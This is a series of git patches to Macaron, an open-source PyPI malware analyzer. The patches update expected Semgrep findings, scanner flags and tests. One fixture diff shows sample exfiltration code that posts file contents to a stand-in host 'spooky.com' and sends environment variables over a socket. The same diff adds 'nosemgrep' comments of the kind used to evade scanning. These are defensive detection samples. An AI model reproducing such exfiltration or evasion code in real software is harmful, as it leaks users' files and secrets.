"/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", + "file": "obfuscation/decode_and_execute.py", "start": 38, "end": 38 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", + "file": "obfuscation/decode_and_execute.py", "start": 44, "end": 44 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 49, "end": 49 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 50, "end": 50 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 51, "end": 51 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 52, "end": 52 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 53, "end": 53 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 54, "end": 54 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 55, "end": 55 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 56, "end": 56 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 57, "end": 57 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 58, "end": 58 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 59, "end": 59 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 60, "end": 60 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 61, "end": 61 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 69, "end": 69 } ], "src.macaron.resources.pypi_malware_rules.default-assigning": [ { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/decode_and_execute.py", + "file": "obfuscation/decode_and_execute.py", "start": 62, "end": 62 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 23, "end": 23 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 24, "end": 24 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 25, "end": 25 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 26, "end": 26 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 27, "end": 27 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 28, "end": 28 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 29, "end": 29 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 30, "end": 30 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 31, "end": 31 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 32, "end": 32 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 33, "end": 33 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 34, "end": 34 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 35, "end": 35 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 36, "end": 36 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 37, "end": 37 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 38, "end": 38 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 39, "end": 39 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 40, "end": 40 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 41, "end": 41 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 42, "end": 42 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 43, "end": 43 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 44, "end": 44 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 45, "end": 45 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 46, "end": 46 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 47, "end": 47 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 48, "end": 48 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 49, "end": 49 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 50, "end": 50 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 51, "end": 51 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 52, "end": 52 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 53, "end": 53 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 54, "end": 54 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 55, "end": 55 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 56, "end": 56 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 57, "end": 57 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 58, "end": 58 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 59, "end": 59 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 60, "end": 60 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/default_assigning.py", + "file": "obfuscation/default_assigning.py", "start": 61, "end": 61 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 68, "end": 68 } ], "src.macaron.resources.pypi_malware_rules.obfuscation-tools": [ { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 23, "end": 23 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 25, "end": 31 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 26, "end": 26 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 27, "end": 27 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 28, "end": 28 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 30, "end": 31 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 33, "end": 33 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 37, "end": 37 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 39, "end": 45 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 40, "end": 40 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 41, "end": 41 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 42, "end": 42 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 44, "end": 45 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 47, "end": 47 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 51, "end": 51 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 53, "end": 59 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 54, "end": 54 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 55, "end": 55 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 56, "end": 56 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 58, "end": 59 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 61, "end": 61 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 65, "end": 65 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 68, "end": 68 }, { - "file": "/home/carl_flottmann/macaron/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/tools.py", + "file": "obfuscation/tools.py", "start": 68, "end": 68 } From f2065be8678ec2e2262f1e6bff1071e65d471bd2 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Thu, 6 Feb 2025 15:24:25 +1000 Subject: [PATCH 14/37] fix: semgrep now only runs open-source functionality, and disabled the nosemgrep feature --- .../sourcecode/pypi_sourcecode_analyzer.py | 43 ++++++++++++------- .../exfiltration/remote-exfiltration.py | 14 +++--- 2 files changed, 35 insertions(+), 22 deletions(-) diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py index 808f5e568..a7924f98a 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py @@ -33,23 +33,29 @@ class PyPISourcecodeAnalyzer(BaseHeuristicAnalyzer): """This class is used to analyze the source code of python PyPI packages. This analyzer is a work in progress. - This analyzer works in two phases. In the first phase, it will perform a pattern-based scan of all python files - in the source code, looking for suspicious patterns defined by the YAML file in defaults.ini. By default, this - will include suspicious package imports, suspicious hardcoded constants, and suspicious function calls. If this - scan does not find any suspicious activity, the analysis will stop and the package will be marked as benign - by this analyzer. If the scan does find suspicious activity, the analyzer will move on to the second phase. - - In the second phase, the analyzer will perform dataflow analysis. This will track the flow of suspicious constants - and the results of suspicious function calls to where they are used, to determine if they are used in a malicious - manner. Suspicious activity includes data exfiltration, code execution, remote connections, operating system and - process manipulation, and encoded and obfuscated patterns. The types of activity, and their severity and quantity, - will then determine the probability of the package being malicious. - - Currently, this analyzer only supports the first phase, and will return simply boolean results on the maliciousness - of the package. + Currently the analyzer performs textual pattern matching and dataflow analysis using the open-source features of + Semgrep. Semgrep open-source taint tracking can only perform in one locale, but this is a known limitation. Default + rules are stored in 'macaron/resources/pypi_malware_rules' as semgrep .yaml rule files. A user may add additional + rules stored in a specified directory passed by them in the 'defaults.ini' configuration file. """ def __init__(self, resources_path: str | None = None) -> None: + """ + Initialise the source code analyzer and load default and custom semgrep rulesets. + + Parameters + ---------- + resources_path: str | None + The path to the resources directory which must contain a 'pypi_malware_rules' directory of + semgrep rules. If None is provided, then this is loaded from the global config resources path. + Defaults to None + + Raises + ------ + ConfigurationError + If the default rule path is invalid, the heuristic.pypi entry is not present, or if the semgrep + validation of the custom rule path failed. + """ super().__init__( name="anomalous_version_analyzer", heuristic=Heuristics.SUSPICIOUS_PATTERNS, @@ -65,6 +71,12 @@ def _load_defaults(self, resources_path: str) -> tuple[str, str | None]: Semgrep validation is run on the custom rules provided by the user. + Parameters + ---------- + resources_path: str + The path to the resources directory which must contain a 'pypi_malware_rules' directory of + semgrep rules. + Returns ------- tuple[str, str | None] @@ -140,7 +152,8 @@ def analyze(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicRes if there is no source code available. """ analysis_result: defaultdict = defaultdict(list) - semgrep_commands: list[str] = ["semgrep", "scan"] + # only run semgrep open-source features, and disable 'nosemgrep' ignoring so this does not bypass our scan + semgrep_commands: list[str] = ["semgrep", "scan", "--oss-only", "--disable-nosem"] result: HeuristicResult = HeuristicResult.PASS source_code_path = pypi_package_json.package_sourcecode_path diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote-exfiltration.py b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote-exfiltration.py index 2ab4a9e14..e2602ef1f 100644 --- a/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote-exfiltration.py +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/exfiltration/remote-exfiltration.py @@ -41,10 +41,10 @@ def file_exfil_to_urllib3(): http = man().request http('POST', "spooky.com", body=oo.read(file, 2048)) - def environ_to_socket(): - import socket as s - from os import environ as environment_vars - with s.socket(s.AF_INET, s.SOCK_STREAM) as soc: - soc.connect(('localhost', 0)) - other = soc - other.send(environment_vars) + def environ_to_socket(): # nosemgrep + import socket as s # nosemsemgrep + from os import environ as environment_vars # nosemgrep + with s.socket(s.AF_INET, s.SOCK_STREAM) as soc: # nosemgrep + soc.connect(('localhost', 0)) # nosemgrep + other = soc # nosemgrep + other.send(environment_vars) # nosemgrep From 262f39595060a8ec401fcdd5c4a9ff64216abe8e Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Tue, 11 Feb 2025 15:06:04 +1000 Subject: [PATCH 15/37] test: added experimental feature to main malware check, tests updated to use MACARON_PATH --- .../pypi/test_pypi_sourcecode_analyzer.py | 18 ++++++------ .../test_detect_malicious_metadata_check.py | 28 ++++++++++++++----- 2 files changed, 31 insertions(+), 15 deletions(-) diff --git a/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py b/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py index 658c8cd59..3fb423e46 100644 --- a/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py +++ b/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py @@ -8,11 +8,13 @@ import pytest -import macaron +from macaron import MACARON_PATH from macaron.errors import ConfigurationError, HeuristicAnalyzerValueError from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult from macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer import PyPISourcecodeAnalyzer +RESOURCES_PATH = os.path.join(MACARON_PATH, "resources") + def test_no_resources() -> None: """Test for when the semgrep rules can't be found, so error.""" @@ -25,7 +27,7 @@ def test_no_defaults_section(mock_defaults: MagicMock) -> None: """Test for when the heuristics.pypi in defaults isn't defined at all, so error.""" mock_defaults.has_section.side_effect = lambda _: False with pytest.raises(ConfigurationError): - _ = PyPISourcecodeAnalyzer(resources_path=os.path.join(os.path.dirname(macaron.__file__), "resources")) + _ = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) @patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") @@ -33,14 +35,14 @@ def test_no_custom_path(mock_defaults: MagicMock) -> None: """Test for when a default path isn't provided, so the custom rule path should be None.""" mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" mock_defaults.__getitem__.side_effect = lambda _: (MagicMock(get=MagicMock(return_value=None))) - analyzer = PyPISourcecodeAnalyzer(resources_path=os.path.join(os.path.dirname(macaron.__file__), "resources")) + analyzer = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) assert analyzer.custom_rule_path is None mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" mock_defaults.__getitem__.side_effect = lambda section: ( MagicMock(get=MagicMock(return_value="" if section == "heuristic.pypi" else None)) ) - analyzer = PyPISourcecodeAnalyzer(resources_path=os.path.join(os.path.dirname(macaron.__file__), "resources")) + analyzer = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) assert analyzer.custom_rule_path is None @@ -52,7 +54,7 @@ def test_nonexistent_rule_path(mock_defaults: MagicMock) -> None: MagicMock(get=MagicMock(return_value="some_random_path" if section == "heuristic.pypi" else None)) ) with pytest.raises(ConfigurationError): - _ = PyPISourcecodeAnalyzer(resources_path=os.path.join(os.path.dirname(macaron.__file__), "resources")) + _ = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) @patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") @@ -64,12 +66,12 @@ def test_invalid_custom_rules(mock_defaults: MagicMock) -> None: MagicMock(get=MagicMock(return_value=os.path.abspath(__file__) if section == "heuristic.pypi" else None)) ) with pytest.raises(ConfigurationError): - _ = PyPISourcecodeAnalyzer(resources_path=os.path.join(os.path.dirname(macaron.__file__), "resources")) + _ = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) def test_no_sourcecode(pypi_package_json: MagicMock) -> None: """Test for when there is no source code available, so error.""" - analyzer = PyPISourcecodeAnalyzer(resources_path=os.path.join(os.path.dirname(macaron.__file__), "resources")) + analyzer = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) pypi_package_json.package_sourcecode_path = "" @@ -103,7 +105,7 @@ def test_rules( MagicMock(get=MagicMock(return_value="" if section == "heuristic.pypi" else None)) ) - analyzer = PyPISourcecodeAnalyzer(resources_path=os.path.join(os.path.dirname(macaron.__file__), "resources")) + analyzer = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) pypi_package_json.package_sourcecode_path = sample_path analyzer.default_rule_path = os.path.join(analyzer.default_rule_path, rule_file) diff --git a/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py b/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py index 15caf3249..3d84ee310 100644 --- a/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py +++ b/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py @@ -7,10 +7,12 @@ import os import urllib.parse from pathlib import Path +from unittest.mock import MagicMock, patch import pytest from pytest_httpserver import HTTPServer +from macaron import MACARON_PATH from macaron.config.defaults import load_defaults from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult, Heuristics from macaron.slsa_analyzer.checks.check_result import CheckResultType @@ -22,21 +24,29 @@ RESOURCE_PATH = Path(__file__).parent.joinpath("resources") +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.global_config") @pytest.mark.parametrize( - ("purl", "expected"), + ("purl", "expected", "experimental"), [ # TODO: This check is expected to FAIL for pkg:pypi/zlibxjson. However, after introducing the wheel presence # heuristic, a false negative has been introduced. Note that if the unit test were allowed to access the OSV # knowledge base, it would report the package as malware. However, we intentionally block unit tests # from reaching the network. - ("pkg:pypi/zlibxjson", CheckResultType.PASSED), - ("pkg:pypi/test", CheckResultType.UNKNOWN), - ("pkg:maven:test/test", CheckResultType.UNKNOWN), + pytest.param("pkg:pypi/zlibxjson", CheckResultType.PASSED, False, id="test_malicious_pypi_package"), + pytest.param("pkg:pypi/test", CheckResultType.UNKNOWN, False, id="test_unknown_pypi_package"), + pytest.param("pkg:maven:test/test", CheckResultType.UNKNOWN, False, id="test_non_pypi_package"), + # TODO: including source code analysis that detects flow from a remote point to a file write may assist in resolving + # the issue of this false negative. + pytest.param("pkg:pypi/zlibxjson", CheckResultType.PASSED, True, id="test_experimental_malicious_pypi_package"), ], ) -def test_detect_malicious_metadata( - httpserver: HTTPServer, tmp_path: Path, macaron_path: Path, purl: str, expected: str -) -> None: +def test_detect_malicious_metadata(mock_global_config: MagicMock, + httpserver: HTTPServer, + tmp_path: Path, + macaron_path: Path, + purl: str, + expected: str, + experimental: bool) -> None: """Test that the check handles repositories correctly.""" check = DetectMaliciousMetadataCheck() @@ -44,6 +54,10 @@ def test_detect_malicious_metadata( ctx = MockAnalyzeContext(macaron_path=macaron_path, output_dir="", purl=purl) pypi_registry = PyPIRegistry() ctx.dynamic_data["package_registries"] = [PackageRegistryInfo("pip", "pypi", pypi_registry)] + if experimental: + ctx.dynamic_data["analyze_source"] = True + + mock_global_config.resources_path = os.path.join(MACARON_PATH, "resources") # Set up responses of PyPI endpoints using the httpserver plugin. with open(os.path.join(RESOURCE_PATH, "pypi_files", "zlibxjson.html"), encoding="utf8") as page: From 5c9a988df91b3eb361a2373c420fa9eb7d3a1381 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Wed, 12 Feb 2025 10:23:10 +1000 Subject: [PATCH 16/37] chore: updated pre-commit hook to only consider tracked files --- scripts/dev_scripts/samples_permissions_checker.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scripts/dev_scripts/samples_permissions_checker.sh b/scripts/dev_scripts/samples_permissions_checker.sh index 7f3d9604f..dc92366f0 100755 --- a/scripts/dev_scripts/samples_permissions_checker.sh +++ b/scripts/dev_scripts/samples_permissions_checker.sh @@ -12,7 +12,7 @@ MACARON_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && cd ../.. && pwd)" SAMPLES_PATH="${MACARON_DIR}/tests/malware_analyzer/pypi/resources/sourcecode_samples" # any files have any of the executable bits set -executables=$(find "$SAMPLES_PATH" -type f -perm -u+x -o -type f -perm -g+x -o -type f -perm -o+x) +executables=$( ( find "$SAMPLES_PATH" -type f -perm -u+x -o -type f -perm -g+x -o -type f -perm -o+x | sed "s|$MACARON_DIR/||"; git ls-files "$SAMPLES_PATH" --full-name) | sort | uniq -d) if [ -n "$executables" ]; then echo "The following files should not have any executable permissions:" echo "$executables" From 3b035f606ea3fa42fc7b12e818eaa03b5d26d46f Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Wed, 12 Feb 2025 13:43:42 +1000 Subject: [PATCH 17/37] chore: added oss only to semgrep validate --- .../pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py index a7924f98a..c742cf2b1 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py @@ -115,7 +115,7 @@ def _load_defaults(self, resources_path: str) -> tuple[str, str | None]: logger.debug(error_msg) raise ConfigurationError(error_msg) - semgrep_commands: list[str] = ["semgrep", "scan", "--validate", "--config", custom_rule_path] + semgrep_commands: list[str] = ["semgrep", "scan", "--validate", "--oss-only", "--config", custom_rule_path] try: process = subprocess.run(semgrep_commands, check=True, capture_output=True) # nosec except (subprocess.CalledProcessError, subprocess.TimeoutExpired) as semgrep_error: From d5db1cd4eb0a597ba3acf436af8d0bb65aeb1972 Mon Sep 17 00:00:00 2001 From: Carl Flottmann Date: Mon, 24 Feb 2025 15:58:23 +1000 Subject: [PATCH 18/37] chore: removed old code Signed-off-by: Carl Flottmann --- .../sourcecode/pypi_sourcecode_analyzer.py | 259 ------------------ 1 file changed, 259 deletions(-) diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py index c742cf2b1..b6702b53a 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/pypi_sourcecode_analyzer.py @@ -7,14 +7,9 @@ This allows for deeper analysis of potentially malicious behavior. """ -import ast -import base64 -import binascii -import ipaddress import json import logging import os -import re import subprocess # nosec import 